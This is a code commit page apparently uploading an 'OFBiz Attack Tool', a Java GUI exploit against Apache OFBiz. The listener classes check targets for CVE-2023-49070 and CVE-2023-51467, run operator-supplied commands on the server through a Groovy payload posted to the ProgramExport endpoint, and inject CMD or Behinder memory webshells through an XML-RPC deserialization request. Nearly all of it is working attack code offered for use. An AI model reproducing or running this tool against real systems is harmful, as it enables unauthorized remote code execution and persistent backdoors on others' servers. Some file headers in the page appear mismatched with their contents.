Add files via upload

Author: N1vi4

out/artifacts/OFBiz_Attack_jar/OFBiz-Attack.jar

@@ -0,0 +1,33 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+
+    <groupId>org.ofbiz</groupId>
+    <artifactId>OFBiz-Attack</artifactId>
+    <version>1.0-SNAPSHOT</version>
+
+    <properties>
+        <maven.compiler.source>8</maven.compiler.source>
+        <maven.compiler.target>8</maven.compiler.target>
+        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+    </properties>
+
+    <dependencies>
+        <dependency>
+            <groupId>org.javassist</groupId>
+            <artifactId>javassist</artifactId>
+            <version>3.19.0-GA</version>
+        </dependency>
+
+        <dependency>
+            <groupId>com.squareup.okhttp3</groupId>
+            <artifactId>okhttp</artifactId>
+            <version>4.9.1</version> <!-- 请使用最新版本 -->
+        </dependency>
+    </dependencies>
+
+
+
+</project>

pom.xml

@@ -0,0 +1,144 @@
+package org.ofbiz;
+
+import org.ofbiz.listener.CmdExecuteListener;
+import org.ofbiz.listener.MemshellInjectListener;
+import org.ofbiz.listener.VulCheckListener;
+
+import javax.swing.*;
+import javax.swing.plaf.basic.BasicTabbedPaneUI;
+import java.awt.*;
+import java.util.Enumeration;
+
+public class Main extends JFrame {
+    private static final String WELCOME = "[+] Welcome to OFBiz Attack Tool\n";
+    private static final String AUTHOR = "[+] Author: Nivia\n";
+
+    private JTextArea outputTextArea;
+
+    public Main() {
+        setTitle("OFBiz Attack Tool");
+        setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
+
+        JTabbedPane tabbedPane = new JTabbedPane();
+        tabbedPane.setUI(new CustomTabbedPaneUI());
+
+        JPanel outputPanel = new JPanel(new BorderLayout());
+        outputTextArea = new JTextArea(20, 30);
+        JScrollPane scrollPane = new JScrollPane(outputTextArea);
+        outputPanel.add(scrollPane, BorderLayout.CENTER);
+
+        outputTextArea.append(WELCOME);
+        outputTextArea.append(AUTHOR);
+        outputTextArea.append("[+] Check first\n");
+
+        tabbedPane.addTab("Vul Check", createCheckPage());
+        tabbedPane.addTab("CMD Execute", createCmdPage());
+        tabbedPane.addTab("Memshell Inject", createMemshellPage());
+
+        add(tabbedPane, BorderLayout.CENTER);
+        add(outputPanel, BorderLayout.SOUTH);
+
+        pack();
+        setLocationRelativeTo(null);
+        setVisible(true);
+    }
+
+    private JPanel createCheckPage() {
+        JPanel pagePanel = new JPanel();
+        pagePanel.setLayout(new BorderLayout());
+
+        JPanel inputPanel = new JPanel();
+        inputPanel.setLayout(new FlowLayout(FlowLayout.LEFT));
+        pagePanel.add(inputPanel, BorderLayout.NORTH);
+
+        JLabel urlLabel = new JLabel("Target Url:");
+        inputPanel.add(urlLabel);
+
+        JTextField urlText = new JTextField(30);
+        inputPanel.add(urlText);
+
+        JButton checkButton = new JButton("Check");
+        checkButton.addActionListener(new VulCheckListener(urlText, outputTextArea));
+        inputPanel.add(checkButton);
+
+        return pagePanel;
+    }
+
+    private JPanel createCmdPage() {
+        JPanel pagePanel = new JPanel();
+        pagePanel.setLayout(new BorderLayout());
+
+        JPanel inputPanel = new JPanel();
+        inputPanel.setLayout(new FlowLayout(FlowLayout.LEFT));
+        pagePanel.add(inputPanel, BorderLayout.NORTH);
+
+        JLabel urlLabel = new JLabel("Command:");
+        inputPanel.add(urlLabel);
+
+        JTextField cmdText = new JTextField(30);
+        inputPanel.add(cmdText);
+
+        JButton executeButton = new JButton("Execute");
+        executeButton.addActionListener(new CmdExecuteListener(cmdText, outputTextArea, VulCheckListener.getTextField()));
+        inputPanel.add(executeButton);
+
+        return pagePanel;
+    }
+
+    private JPanel createMemshellPage() {
+        JPanel pagePanel = new JPanel();
+        pagePanel.setLayout(new BorderLayout());
+
+        JPanel inputPanel = new JPanel();
+        inputPanel.setLayout(new BoxLayout(inputPanel, BoxLayout.X_AXIS));
+        pagePanel.add(inputPanel, BorderLayout.NORTH);
+
+        ButtonGroup buttonGroup = new ButtonGroup();
+
+        JRadioButton cmdMemshellButton = new JRadioButton("CMD (Visit /webtools/*)");
+        JRadioButton behinderMemshellButton = new JRadioButton("Behinder (Default key)");
+
+        buttonGroup.add(cmdMemshellButton);
+        buttonGroup.add(behinderMemshellButton);
+
+        inputPanel.add(cmdMemshellButton);
+        inputPanel.add(behinderMemshellButton);
+
+        JButton injectButton = new JButton("Inject");
+
+        injectButton.addActionListener(new MemshellInjectListener(buttonGroup, outputTextArea, VulCheckListener.getTextField()));
+        inputPanel.add(injectButton);
+
+        return pagePanel;
+    }
+
+    public static void main(String[] args) {
+        SwingUtilities.invokeLater(Main::new);
+    }
+
+    static class CustomTabbedPaneUI extends BasicTabbedPaneUI {
+        private static final Color selectedTabColor = Color.WHITE;
+        private static final Color selectedTabTitleColor = Color.BLACK;
+
+        @Override
+        protected void paintTabBackground(Graphics g, int tabPlacement, int tabIndex, int x, int y, int w, int h, boolean isSelected) {
+            if (isSelected) {
+                g.setColor(selectedTabColor);
+                g.fillRect(x, y, w, h);
+            } else {
+                super.paintTabBackground(g, tabPlacement, tabIndex, x, y, w, h, isSelected);
+            }
+        }
+
+        @Override
+        protected void paintText(Graphics g, int tabPlacement, Font font, FontMetrics metrics, int tabIndex, String title, Rectangle textRect, boolean isSelected) {
+            if (isSelected) {
+                g.setColor(selectedTabTitleColor);
+            } else {
+                g.setColor(tabPane.getForegroundAt(tabIndex));
+            }
+
+            super.paintText(g, tabPlacement, font, metrics, tabIndex, title, textRect, isSelected);
+        }
+    }
+}

src/main/java/org/ofbiz/Main.java

@@ -0,0 +1,68 @@
+package org.ofbiz.listener;
+
+import okhttp3.Response;
+import org.ofbiz.shell.ShellManager;
+import org.ofbiz.util.Http;
+
+import javax.swing.*;
+import java.awt.event.ActionEvent;
+import java.awt.event.ActionListener;
+import java.io.IOException;
+import java.net.URLEncoder;
+
+import static org.ofbiz.util.Check.*;
+
+public class CmdExecuteListener implements ActionListener {
+    private static final String EXCEPTION_TEXT = "java.lang.Exception:";
+
+    private JTextField cmdText;
+    private JTextArea outputTextArea;
+    private JTextField textField;
+
+    public CmdExecuteListener(JTextField cmdText, JTextArea outputTextArea, JTextField textField) {
+        this.cmdText = cmdText;
+        this.outputTextArea = outputTextArea;
+        this.textField = textField;
+    }
+
+    @Override
+    public void actionPerformed(ActionEvent e) {
+        String url = textField.getText();
+
+        if (url.equals("") || !VulCheckListener.hasCheck){
+            JOptionPane.showMessageDialog(textField.getParent(), "No Vulnerability or Not check yet", "Error", JOptionPane.ERROR_MESSAGE);
+            return;
+        }
+
+        if(url.endsWith("/")){
+            url = url.substring(0, url.length() - 1);
+        }
+
+        String vulUrl = url + "/webtools/control/ProgramExport?" + PERMISSION_TEXT;
+        String body = "groovyProgram=" + URLEncoder.encode(ShellManager.getGroovyShell(cmdText.getText()));
+
+        Response response = Http.sendHttpsPostRequest(vulUrl, body, "application/x-www-form-urlencoded");
+        try {
+            String responseText = response.body().string();
+
+            if (response.isSuccessful() && response.code() == 200 && (responseText.contains(EXCEPTION_TEXT))){
+                int startIndex = responseText.indexOf(EXCEPTION_TEXT);
+                String endTag = "</p>";
+                int endIndex = responseText.indexOf(endTag, startIndex);
+
+                if (startIndex != -1) {
+                    startIndex += EXCEPTION_TEXT.length();
+                    String cmdResult = responseText.substring(startIndex, endIndex).trim();
+                    if (cmdResult.equals("")){
+                        outputTextArea.append("[+] Execute Success!\n");
+                    }
+                    else {outputTextArea.append("[+] Execute Result: \n" + cmdResult + "\n");}
+                }
+            } else {
+                outputTextArea.append("[+] Not executed for security reason\n");
+            }
+        } catch (IOException ex) {
+            throw new RuntimeException(ex);
+        }
+    }
+}

src/main/java/org/ofbiz/listener/CmdExecuteListener.java

@@ -0,0 +1,77 @@
+package org.ofbiz.listener;
+
+import org.ofbiz.shell.ShellManager;
+import org.ofbiz.util.Http;
+
+import javax.swing.*;
+import java.awt.event.ActionEvent;
+import java.awt.event.ActionListener;
+import java.util.Enumeration;
+
+import static org.ofbiz.shell.ShellManager.*;
+import static org.ofbiz.util.Check.*;
+
+public class MemshellInjectListener implements ActionListener {
+    private ButtonGroup buttonGroup;
+    private JTextArea outputTextArea;
+    private JTextField textField;
+
+    private static final String CMD_BUTTON_TEXT = "CMD (Visit /webtools/*)";
+    private static final String BEHINDER_BUTTON_TEXT = "Behinder (Default key)";
+
+
+    public MemshellInjectListener(ButtonGroup buttonGroup, JTextArea outputTextArea, JTextField textField){
+        this.buttonGroup = buttonGroup;
+        this.outputTextArea = outputTextArea;
+        this.textField = textField;
+
+    }
+
+    @Override
+    public void actionPerformed(ActionEvent e) {
+        String url = textField.getText();
+
+        if (url.equals("") || !VulCheckListener.hasCheck || !VulCheckListener.has_cve_2023_49070){
+            JOptionPane.showMessageDialog(textField.getParent(), "No Vulnerability or Not check yet", "Error", JOptionPane.ERROR_MESSAGE);
+            return;
+        }
+
+        Enumeration<AbstractButton> buttons = buttonGroup.getElements();
+        boolean isSelected = false;
+
+        if(url.endsWith("/")){
+            url = url.substring(0, url.length() - 1);
+        }
+
+        String vulUrl = url + "/webtools/control/xmlrpc;?" + PERMISSION_TEXT;
+        String body = "";
+
+        while (buttons.hasMoreElements()) {
+            AbstractButton button = buttons.nextElement();
+            if (button.isSelected()) {
+                String selectedButtonText = button.getText();
+                switch (selectedButtonText){
+                    case CMD_BUTTON_TEXT:
+                        body = ShellManager.getXmlrpcDeserializable(CMD_MEMSHELL);
+                        isSelected = true;
+                        break;
+                    case BEHINDER_BUTTON_TEXT:
+                        body = ShellManager.getXmlrpcDeserializable(BEHINDER_MEMSHELL);
+                        isSelected = true;
+                        break;
+                }
+                break;
+            }
+        }
+
+        if (!isSelected) {
+            JOptionPane.showMessageDialog(textField.getParent(), "Select Type!", "Error", JOptionPane.ERROR_MESSAGE);
+            return;
+        }
+
+        Http.sendHttpsPostRequest(vulUrl, body, "application/xml");
+        Http.sendHttpsPostRequest(vulUrl, body, "application/xml");
+
+        outputTextArea.append("[+] Inject Success!\n");
+    }
+}

src/main/java/org/ofbiz/listener/MemshellInjectListener.java

@@ -0,0 +1,62 @@
+package org.ofbiz.listener;
+
+import javax.swing.*;
+import java.awt.event.ActionEvent;
+import java.awt.event.ActionListener;
+import java.io.IOException;
+
+import static org.ofbiz.util.Check.*;
+
+public class VulCheckListener implements ActionListener {
+    private static JTextField textField;
+    private JTextArea outputTextArea;
+    public static boolean hasCheck = false;
+    public static boolean has_cve_2023_49070 = false;
+
+    public VulCheckListener(JTextField textField, JTextArea outputTextArea) {
+        this.textField = textField;
+        this.outputTextArea = outputTextArea;
+    }
+
+    @Override
+    public void actionPerformed(ActionEvent e) {
+        String url = textField.getText();
+
+        if(!isValidHttpUrl(url)){
+            JOptionPane.showMessageDialog(textField.getParent(), "URL format is not valid!", "Error", JOptionPane.ERROR_MESSAGE);
+            return;
+        }
+
+        try {
+            if(has_CVE_2023_49070(url)){
+                hasCheck = true;
+                has_cve_2023_49070 = true;
+                outputTextArea.append("[+] has CVE-2023-49070, Attack!\n");
+                outputTextArea.append("[+] has CVE-2023-51467, Attack!\n");
+                return;
+            }
+            else {
+                hasCheck = false;
+                outputTextArea.append("[-] no CVE-2023-49070 :(\n");
+            }
+
+            if (has_CVE_2023_51467(url)){
+                hasCheck = true;
+                outputTextArea.append("[+] has CVE-2023-51467, Attack!\n");
+            }
+            else {
+                hasCheck = false;
+                outputTextArea.append("[-] no CVE-2023-51467 :(\n");
+            }
+
+
+        } catch (Exception ex) {
+
+        }
+    }
+
+    public static JTextField getTextField(){
+        return textField;
+    }
+
+}